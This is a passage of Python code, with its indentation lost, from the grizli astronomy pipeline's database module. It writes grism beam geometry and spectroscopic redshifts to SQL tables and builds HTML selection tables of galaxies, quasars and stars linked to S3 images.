for k in ['root', 'id', 'objid', 'filter', 'pupil', 'pa', 'instrument', 'fwcpos', 'order', 'parent', 'parent_ext', 'ccdchip', 'sci_extn', 'exptime', 'origin_x', 'origin_y', 'pad', 'nx', 'ny', 'sregion']:
d[k] = []
for beam in mb.beams:
d['root'].append(root)
d['id'].append(id)
d['objid'].append(-1)
for a in ['filter', 'pupil', 'instrument', 'pad',
'fwcpos', 'ccdchip', 'sci_extn', 'exptime']:
d[a].append(getattr(beam.grism, a))
d['order'].append(beam.beam.beam)
parent = beam.grism.parent_file.replace('.fits', '').split('_')
d['parent'].append(parent[0])
d['parent_ext'].append(parent[1])
d['origin_x'].append(beam.grism.origin[1])
d['origin_y'].append(beam.grism.origin[0])
d['nx'].append(beam.sh[1])
d['ny'].append(beam.sh[0])
f = beam.grism.wcs.calc_footprint().flatten()
fs = ','.join(['{0:.6f}'.format(c) for c in f])
d['sregion'].append('POLYGON({0})'.format(fs))
d['pa'].append(int(np.round(beam.get_dispersion_PA())))
df = pd.DataFrame.from_dict(d)
# Send to database
res = engine.execute("DELETE from beam_geometry WHERE (root = '{0}' AND id = {1})".format(mb.group_name, mb.id), engine)
df.to_sql('beam_geometry', engine, index=False, if_exists='append', method='multi')
if False:
# Fix multibeam arrays
import pandas as pd
import numpy as np
from sqlalchemy import types
from grizli.aws import db as grizli_db
engine = grizli_db.get_db_engine()
df = pd.read_sql_query('select id, root, scip, errp, snp, contamp, fcontamp from multibeam mb', engine)
c = 'snp'
data = pd.DataFrame()
data['id'] = df['id']
data['root'] = df['root']
dtype = {'root': types.String, 'id': types.Integer}
for c in df.columns:
if c.endswith('p'):
print(c)
dtype[c[:-1]+'_p'] = types.ARRAY(types.FLOAT)
data[c[:-1]+'_p'] = [list(np.cast[float](line.strip()[1:-1].split(','))) for line in df[c]]
data.to_sql('multibeam_tmp', engine, index=False, if_exists='append', method='multi')
from sqlalchemy import types
for c in df.columns:
if c.endswith('p'):
pass
for c in df.columns:
if c.endswith('p'):
sql = "ALTER TABLE multibeam ADD COLUMN {0} real[];".format(c[:-1]+'_p')
print(sql)
sql = "UPDATE multibeam mb SET {new} = tmp.{new} FROM multibeam_tmp tmp WHERE tmp.id = mb.id AND tmp.root = mb.root;".format(new=c[:-1]+'_p')
print(sql)
x = grizli_db.from_sql('select id, scip, errp, snp, contamp, fcontamp from multibeam mb', engine)
def test_join():
import pandas as pd
res = pd.read_sql_query("SELECT root, id, flux_radius, mag_auto, z_map, status, bic_diff, zwidth1, log_pdf_max, chinu FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0) z ON (p.p_root = z.root AND p.p_id = z.id)", engine)
res = pd.read_sql_query("SELECT * FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0) z ON (p.p_root = z.root AND p.p_id = z.id)", engine)
# on root
root = 'xxx'
res = pd.read_sql_query("SELECT p.root, p.id, mag_auto, z_map, status FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE root='{0}') z ON (p.p_root = z.root AND p.p_id = z.id)".format(root), engine)
def column_comments():
from collections import OrderedDict
import yaml
tablename = 'redshift_fit'
cols = pd.read_sql_query('select * from {0} where false'.format(tablename), engine)
d = {} # OrderedDict{}
for c in cols.columns:
d[c] = '---'
if not os.path.exists('{0}_comments.yml'.format(tablename)):
print('Init {0}_comments.yml'.format(tablename))
fp = open('{0}_comments.yml'.format(tablename), 'w')
yaml.dump(d, stream=fp, default_flow_style=False)
fp.close()
# Edit file
comments = yaml.load(open('{0}_comments.yml'.format(tablename)))
SQL = ""
upd = "COMMENT ON COLUMN {0}.{1} IS '{2}';\n"
for col in comments:
if comments[col] != '---':
SQL += upd.format(tablename, col, comments[col])
else:
print('Skip ', col)
def add_spectroscopic_redshifts(xtab, rmatch=1, engine=None, db=None):
"""
Add spectroscopic redshifts to the photometry_apcorr table
Input table needs (at least) columns:
['ra', 'dec', 'z_spec', 'z_spec_src', 'z_spec_qual_raw', 'z_spec_qual']
"""
import glob
import pandas as pd
from astropy.table import vstack
from grizli.aws import db as grizli_db
from grizli import utils
for c in ['ra', 'dec', 'z_spec', 'z_spec_src', 'z_spec_qual_raw', 'z_spec_qual']:
if c not in xtab.colnames:
print('Column {0} not found in input table'.format(c))
return False
if engine is None:
engine = grizli_db.get_db_engine(echo=False)
# Force data types
tab = xtab[xtab['z_spec'] >= 0]
if hasattr(tab['ra'], 'mask'):
tab = tab[~tab['ra'].mask]
tab['z_spec_qual'] = tab['z_spec_qual']*1
tab['z_spec_qual_raw'] = tab['z_spec_qual_raw']*1
if False:
# duplicates
fit = grizli_db.from_sql("select root, ra, dec from redshift_fit", engine)
fit = grizli_db.from_sql("select root, ra, dec from redshift_fit where ra is null", engine)
# Select master table
if db is None:
res = pd.read_sql_query("SELECT p_root, p_id, p_ra, p_dec, z_spec from photometry_apcorr", engine)
db = utils.GTable.from_pandas(res)
for c in ['p_root', 'p_id', 'p_ra', 'p_dec']:
db.rename_column(c, c[2:])
idx, dr = db.match_to_catalog_sky(tab)
hasm = (dr.value < rmatch) & (tab['z_spec'] >= 0)
tab['z_spec_dr'] = dr.value
tab['z_spec_ra'] = tab['ra']
tab['z_spec_dec'] = tab['dec']
tab['db_root'] = db['root'][idx]
tab['db_id'] = db['id'][idx]
tabm = tab[hasm]['db_root', 'db_id', 'z_spec', 'z_spec_src', 'z_spec_dr', 'z_spec_ra', 'z_spec_dec', 'z_spec_qual_raw', 'z_spec_qual']
print('Send zspec to photometry_apcorr (N={0})'.format(hasm.sum()))
df = tabm.to_pandas()
df.to_sql('z_spec_tmp', engine, index=False, if_exists='replace', method='multi')
SQL = """UPDATE photometry_apcorr
SET z_spec = zt.z_spec,
z_spec_src = zt.z_spec_src,
z_spec_dr = zt.z_spec_dr,
z_spec_ra = zt.z_spec_ra,
z_spec_dec = zt.z_spec_dec,
z_spec_qual_raw = zt.z_spec_qual_raw,
z_spec_qual = zt.z_spec_qual
FROM z_spec_tmp as zt
WHERE (zt.db_root = p_root AND zt.db_id = p_id);
"""
engine.execute(SQL)
if False:
# Update redshift_fit ra/dec with photometry_table double prec.
SQL = """UPDATE redshift_fit
SET ra = p_ra
dec = p_dec
FROM photometry_apcorr
WHERE (phot_root = p_root AND id = p_id AND root = 'j123556p6221');
"""
def mtime_to_iso(ct):
"""
Convert mtime values to ISO format suitable for sorting, etc.
"""
months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
spl = ct.split()
iso = '{yr}-{mo:02d}-{dy:02d} {time}'.format(dy=int(spl[2]), mo=int(months.index(spl[1])+1), yr=spl[-1], time=spl[-2])
return iso
def various_selections():
from grizli.aws import db as grizli_db
# sdss z_spec
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND z_spec_src ~ '^sdss-dr15'", table_root='sdss_zspec', sync='s3://grizli-v1/tables/')
# objects with carla redshifts (radio loud)
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND z_spec_src ~ '^carla'", table_root='carla_zspec', sync='s3://grizli-v1/tables/')
# Bright galaxies with q_z flag
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'q_z', 'q_z > -0.69 as q_z_TPR90', 'dlinesn'], where="AND status > 4 AND mag_auto < 22 AND z_map > 1.3", table_root='bright', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
# High-z compiliation
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'q_z', 'h_zphot', 'h_src', 'h_dr'], where="AND status > 4 AND phot_root = h_root AND id = h_id AND h_dr < 1", tables=['highz_2015'], table_root='highz', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
# z_spec with dz
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'zwidth1/(1+z_map) as zw1', '(z_map-z_spec)/(1+z_spec) as dz', 'dlinesn'], where="AND status > 4 AND z_spec > 0 AND z_spec_qual = 1", table_root='zspec_delta', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# Point sources
res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'red_bit', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND mag_auto < 24 AND flux_radius < 1.9 AND ((flux_radius < 1.5 AND flux_radius > 0.75 AND red_bit > 32) OR (flux_radius < 1.9 AND flux_radius > 1.0 AND red_bit < 32))", table_root='point_sources', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], get_sql=False)
# Reliable redshifts
res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', '(flux_radius < 1.7 AND ((flux_radius < 1.4 AND flux_radius > 0.75 AND red_bit > 32) OR (flux_radius < 1.7 AND flux_radius > 1.0 AND red_bit < 32)))::int as is_point', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'sn_siii', 'sn_ha', 'sn_oiii', 'sn_oii', 'ew50_ha', 'd4000', 'd4000_e', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND chinu < 30 AND q_z > -0.7 order by q_z", table_root='reliable_redshifts', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full'], get_sql=False, sort_column=('q_z', -1))
# stellar classification?
# sql = """SELECT root, id, ra, dec, status, z_map, q_z_map, bic_diff,
# bic_diff_star,
# chinu as t_chinu, s_chinu, q_chinu,
# chinu - q_chinu as tq_chinu, q_chinu - s_chinu as qs_chinu,
# chinu - s_chinu as ts_chinu, stellar_template
# FROM redshift_fit,
# (SELECT root as s_root, id as s_id, chinu as s_chinu, bic_diff_star,
# stellar_template
# FROM stellar_fit
# WHERE status = 6
# ) as s,
# (SELECT root as q_root, id as q_id, chinu as q_chinu,
# bic_diff as q_bic_diff, z_map as q_z_map
# FROM redshift_fit_quasar
# WHERE status = 6
# ) as q
# WHERE (root = s_root AND id = s_id) AND (root = q_root AND id = q_id)
# """
#res = grizli_db.make_html_table(engine=engine, res=cstar, table_root='carbon_stars', sync='s3://grizli-v1/tables/', png_ext=['stack','line', 'full', 'qso.full', 'star'], sort_column=('bic_diff_star', -1), get_sql=False)
sql = """SELECT root, id, status, ra, dec, t_g800l, t_g102, t_g141,
z_map, q_z_map, bic_diff,
bic_diff_star, (bic_diff_star > 10 AND q_chinu < 20 AND chinu - q_chinu > 0.05 AND q_chinu-s_chinu > 0 AND chinu-s_chinu > 0.1)::int as is_star,
chinu as t_chinu, s_chinu, q_chinu,
bic_qso-bic_gal as bic_gq,
bic_gal-bic_star as bic_gs,
bic_qso-bic_star as bic_qs,
(bic_spl+chimin)-bic_gal as bic_gx,
bic_spl_qso-bic_qso as bic_qx,
q_vel_bl, qso_q_z, qso_zw1, stellar_template
FROM (SELECT *, bic_temp+chimin as bic_gal FROM redshift_fit z,
(SELECT root as q_root, id as q_id, chinu as q_chinu,
bic_diff as q_bic_diff, bic_temp+chimin as bic_qso,
bic_spl+chimin as bic_spl_qso,
z_map as qso_z_map,
zwidth1/(1+z_map) as qso_zw1, vel_bl as q_vel_bl,
q_z as qso_q_z
FROM redshift_fit_quasar
WHERE status = 6
) q
WHERE (root = q_root AND id = q_id)) c
LEFT JOIN
(SELECT root as s_root, id as s_id, chinu as s_chinu,
LN(dof)*nk+chi2 as bic_star,
LN(dof)*(nk-1)+chi2_flat as bic_spline,
bic_diff_star,
stellar_template
FROM stellar_fit
WHERE status = 6
) s ON (root = s_root AND id = s_id) WHERE chinu-q_chinu > 0.5
"""
cstar = grizli_db.from_sql(sql, engine)
cstar['is_star'] = cstar['is_star'].filled(-1)
print('N={0}'.format(len(cstar)))
res = grizli_db.make_html_table(engine=engine, res=cstar, table_root='quasars_and_stars', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], sort_column=('bic_diff_star', -1), get_sql=False)
# best-fit as quasar
sql = """SELECT root, id, ra, dec, status, z_map, q_z_map,
q_z, bic_diff, q_bic_diff,
chinu as t_chinu, q_chinu,
chinu - q_chinu as tq_chinu,
(q_bic_temp + q_chimin) - (bic_temp + chimin) as bic_diff_quasar,
q_vel_bl
FROM redshift_fit z JOIN
(SELECT root as q_root, id as q_id, chinu as q_chinu,
bic_diff as q_bic_diff, z_map as q_z_map, vel_bl,
chimin as q_chimin, bic_temp as q_bic_temp, vel_bl as q_vel_bl
FROM redshift_fit_quasar
WHERE status = 6
) as q
WHERE (root = q_root AND id = q_id) AND status = 6 AND q_z > -1
"""
qq = grizli_db.from_sql(sql, engine)
res = grizli_db.make_html_table(engine=engine, res=qq, table_root='quasar_fit', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], get_sql=False)
# Strong lines
res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'red_bit', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', 'sn_ha', 'sn_oiii', 'sn_oii'], where="AND status > 4 AND mag_auto < 24 AND (sn_ha > 10 OR sn_oiii > 10 OR sn_oii > 10) AND flux_radius >= 1.6", table_root='strong_lines', sync='s3://grizli-v1/tables/', png_ext=['stack', 'full', 'qso.full', 'star'])
# brown dwarf?
tablename = 'spec1d_r30_g141'
wave = pd.read_sql_query("SELECT * from {0}_wave".format(tablename),
engine)[tablename+'_wave'].values
# 1.15, 1.25, 1.4
i0 = 25, 28, 29, 32
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', '{0}_flux[25]/{0}_flux[28] as c1'.format(tablename), '{0}_flux[32]/{0}_flux[28] as c2'.format(tablename)], where="AND status > 4 AND flux_radius < 2 AND flux_radius > 1 AND mag_auto < 25 AND {0}_root = root AND {0}_id = id AND {0}_flux[28] > 0 AND {0}_flux[28]/{0}_err[28] > 5 AND {0}_flux[32] > 0 AND {0}_flux[25] > 0 AND {0}_flux[32]/{0}_flux[28] < 0.5".format(tablename), tables=[tablename], table_root='point_sources_colors', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', '{0}_flux[25] as c25'.format(tablename), '{0}_flux[32] as c32'.format(tablename)], where="AND status > 4 AND z_spec = 0".format(tablename), tables=[tablename], table_root='point_sources_colors', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# with line ratios
lstr = 'err_{0} > 0 AND err_{0} < 5e-17'
err_lines = ' AND '.join(lstr.format(li) for li in
['hb', 'oiii', 'ha', 'sii'])
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'zwidth1/(1+z_map) as zw1', '(z_map-z_spec)/(1+z_spec) as dz', 'dlinesn', 'flux_hb/flux_ha as HbHa', 'flux_hb/flux_oiii as HbO3', 'flux_oiii/flux_ha as O3Ha'], where="AND status > 4 AND z_spec > 0 AND z_spec_qual = 1 AND sn_oiii > 3 AND sn_ha > 2 AND {0}".format(err_lines), table_root='zspec_lines', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
if False:
from matplotlib.ticker import FixedLocator, AutoLocator, MaxNLocator
import matplotlib.pyplot as plt
xti = xt = np.arange(0, 3.6, 0.5)
loc = np.arange(0, 3.6, 0.1)
bins = utils.log_zgrid([0.03, 3.5], 0.01)
fig = plt.figure(figsize=[7, 6])
ax = fig.add_subplot(111)
ax.scatter(np.log(1+res['z_spec']), np.log(1+res['z_map']), alpha=0.2, c=np.log10(res['zw1']), marker='.', vmin=-3.5, vmax=-0.5, cmap='plasma')
sc = ax.scatter(np.log([1]), np.log([1]), alpha=0.8, c=[0], marker='.', vmin=-3.5, vmax=-0.5, cmap='plasma')
cb = plt.colorbar(sc, shrink=0.6)
cb.set_label(r'$(z_{84}-z_{16})/(1+z_{50})$')
cb.set_ticks([-3, -2, -1])
cb.set_ticklabels([0.001, 0.01, 0.1])
xts = ax.set_xticks(np.log(1+xt))
xtl = ax.set_xticklabels(xti)
xts = ax.set_yticks(np.log(1+xt))
xtl = ax.set_yticklabels(xti)
ax.set_xlim(0, np.log(1+3.5))
ax.set_ylim(0, np.log(1+3.5))
ax.xaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
ax.yaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
ax.set_xlabel('z_spec')
ax.set_ylabel('z_MAP')
ax.set_aspect(1)
ax.grid()
ax.text(0.95, 0.05, r'$N={0}$'.format(len(res)), ha='right', va='bottom', transform=ax.transAxes)
ax.plot(ax.get_xlim(), ax.get_xlim(), color='k', alpha=0.2, linewidth=1, zorder=-10)
fig.tight_layout(pad=0.1)
fig.savefig('grizli_v1_literature_zspec.pdf')
# COSMOS test
root = 'cos-grism-j100012p0210'
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND bic_diff > 100 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
# high bic_diff = unambiguous
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e', '-(bic_temp-bic_spl) as bic_diff_spl'], where="AND status > 5 AND (((bic_diff > 50 OR zwidth1/(1+z_map) < 0.01) AND chinu < 2))", table_root='unamb', sync='s3://grizli-v1/tables/')
# with d4000
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e'], where="AND status > 5 AND chinu < 3 AND d4000 > 1 AND d4000 < 5 AND d4000_e > 0 AND d4000_e < 0.25 AND bic_diff > 5", table_root='d4000', sync='s3://grizli-v1/tables/')
# LBG?
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '-(bic_temp-bic_spl) as bic_diff_spl', 'splf01/splf02 as r12', 'splf02/splf03 as r23', 'splf02/sple02 as sn02'], where="AND status > 5 AND mag_auto > 23 AND bic_diff > -50 AND splf01/splf02 < 0.3 AND splf02/sple02 > 2 AND splf01 != 0 AND splf02 != 0 AND splf03 != 0 ".format(root), table_root='lbg_g800l', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# stars?
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND bic_diff > 100 AND chinu < 1.5 AND mag_auto < 24 AND sn_Ha > 20", table_root='star', sync='s3://grizli-v1/tables/')
# By root
root = 'j001420m3030'
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND root = '{0}' AND bic_diff > 5".format(root), table_root=root+'-fit', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# G800L spec-zs
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '(z_map-z_spec)/(1+z_spec) as delta_z'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND t_g800l > 0", table_root='zspec_g800l', sync='s3://grizli-v1/tables/')
# Large G800L likely mismatch [OIII]/Ha
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'ew50_oiii/(1+z_map) as ew_oiii_rest', 'sn_oiii'], where="AND status > 5 AND t_g800l > 0 AND sn_oiii > 3 AND mag_auto < 23 AND bic_diff > 5", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/')
# Potential Ly-a?
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'ew50_oiii/(1+z_map) as ew_oiii_rest', 'sn_oiii'], where="AND status > 5 AND t_g800l > 0 AND sn_oiii > 5 AND sn_ha > 0 AND flux_oiii/flux_ha > 1.8", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/')
# Continuum resid
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND bic_diff > 5 AND splf01 > 0 AND bic_diff > 50".format(root), table_root='xxx', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 as fresid', 'splf01/sple01 as sn01', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND t_g800l > 0 AND f814w_tot_1 > 0 AND splf01 != 0 AND splf01/sple01 > 1 AND f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 > 0 AND (f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 < 0.3 OR f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 > 4)", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
sql = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'splf01', 'sple01', 'f814w_tot_1', 'f850lp_tot_1', 'flux_auto/flux_iso as flux_aper_corr', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND t_g800l > 0 AND splf01 > 0", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], get_sql=True)
res = pd.read_sql_query(sql, engine)
splmag = 23.9-2.5*np.log10(np.maximum(res['splf01'], 1.e-22)*8140**2/3.e18*1.e29)
sql = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'splf03', 'sple03', 'f140w_tot_1', 'f160w_tot_1', 'flux_auto/flux_iso as flux_aper_corr'], where="AND status > 5 AND t_g141 > 0 AND sple03 > 0", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], get_sql=True)
res = pd.read_sql_query(sql, engine)
splmag = 23.9-2.5*np.log10(np.maximum(res['splf03'], 1.e-22)*1.2e4**2/3.e18*1.e29)
# Number of matches per field
counts = pd.read_sql_query("select root, COUNT(root) as n from redshift_fit, photometry_apcorr where phot_root = p_root AND id = p_id AND bic_diff > 50 AND mag_auto < 24 group by root;", engine)
def from_sql(query, engine, **kwargs):
import pandas as pd
from grizli import utils
res = pd.read_sql_query(query, engine)
tab = utils.GTable.from_pandas(res)
set_column_formats(tab, **kwargs)
return tab
def render_for_notebook(tab, image_extensions=['stack', 'full', 'line'], bucket='grizli-v1', max_rows=20, link_root=True, link_type='grism'):
"""
Render images for inline display in a notebook
In [1]: from IPython.display import HTML
In [2]: HTML(tab)
"""
import pandas as pd
from eazy import utils as eu
pd.set_option('display.max_colwidth', -1)
rows = tab[:max_rows].copy()
buckets = [bucket]*len(rows)
for i, r in enumerate(rows['root']):
if r.startswith('cos-g'):
buckets[i] = 'grizli-cosmos-v2'
rows['bucket'] = buckets
rows['ext'] = 'longstring' # longer than the longest extension
s3url = 'https://s3.amazonaws.com/{bucket}/Pipeline/{root}/Extractions/{root}_{id:05d}.{ext}.png'
def href_root(root):
if root.startswith('cos-g'):
bucket_i = 'grizli-cosmos-v2'
else:
bucket_i = bucket
s3 = 'https://s3.amazonaws.com/'+bucket_i+'/Pipeline/{0}/Extractions/{0}.html'
return '<a href={0}>{1}</a>'.format(s3.format(root), root)
def path_to_image_html(path):
return '<a href={0}><img src="{0}"/></a>'.format(path)
# link for root
fmt = {}
cols = list(rows.colnames)
if link_root:
if link_type == 'grism':
fmt = {'root': href_root}
elif (link_type in ['cds','eso','alma','mast']) & ('ra' in cols):
funcs = {'cds':eu.cds_query,
'eso':eu.eso_query,
'alma':eu.alma_query,
'mast':eu.mast_query}
urls = [funcs[link_type](ra, dec)
for ra, dec in zip(tab['ra'], tab['dec'])]
href = [f'<a href="{u}"> {r} {i} </a>'
for u, r, i in zip(urls, tab['root'], tab['id'])]
rows['xroot'] = href
cols = ['xroot'] + cols
for c in ['root','id','ra','dec']:
cols.pop(cols.index(c))
for ext in image_extensions:
rows['ext'] = ext
urls = [s3url.format(**row) for row in rows.to_pandas().to_dict(orient='records')]
rows[ext] = urls
fmt[ext] = path_to_image_html
cols.append(ext)
rows.remove_columns(['bucket', 'ext'])
for c in ['bucket','ext']:
cols.pop(cols.index(c))
out = rows[cols].to_pandas().to_html(escape=False, formatters=fmt)
return out
def add_to_charge():
from grizli.aws import db
engine = db.get_db_engine()
p = db.from_sql('select distinct p_root from photometry_apcorr', engine)
f = db.from_sql('select distinct field_root from charge_fields', engine)
new_fields = []
for root in p['p_root']:
if root not in f['field_root']:
print(root)
new_fields.append(root)
df = pd.DataFrame()
df['field_root'] = new_fields
df['comment'] = 'CANDELS'
ix = df['field_root'] == 'j214224m4420'
df['comment'][ix] = 'Rafelski UltraDeep'
df.to_sql('charge_fields', engine, index=False, if_exists='append', method='multi')
def add_by_footprint(footprint_file='j141156p3415_footprint.fits', engine=None):
import pandas as pd
from grizli.aws import db
## By footprint
if engine is None:
engine = db.get_db_engine()
#ch = pd.read_sql_query('select * from charge_fields', engine)
f = pd.read_sql_query('select distinct field_root from charge_fields', engine)
fp = utils.read_catalog(footprint_file)
root = fp.meta['NAME']
if root in f['field_root'].tolist():
print(f'Field found: {root}')
return False
df = pd.DataFrame()
df['field_root'] = [root]
df['comment'] = 'manual'
df['field_xmin'] = fp.meta['XMIN']
df['field_xmax'] = fp.meta['XMAX']
df['field_ymin'] = fp.meta['YMIN']
df['field_ymax'] = fp.meta['YMAX']
df['field_ra'] = np.mean(fp['ra'])
df['field_dec'] = np.mean(fp['dec'])
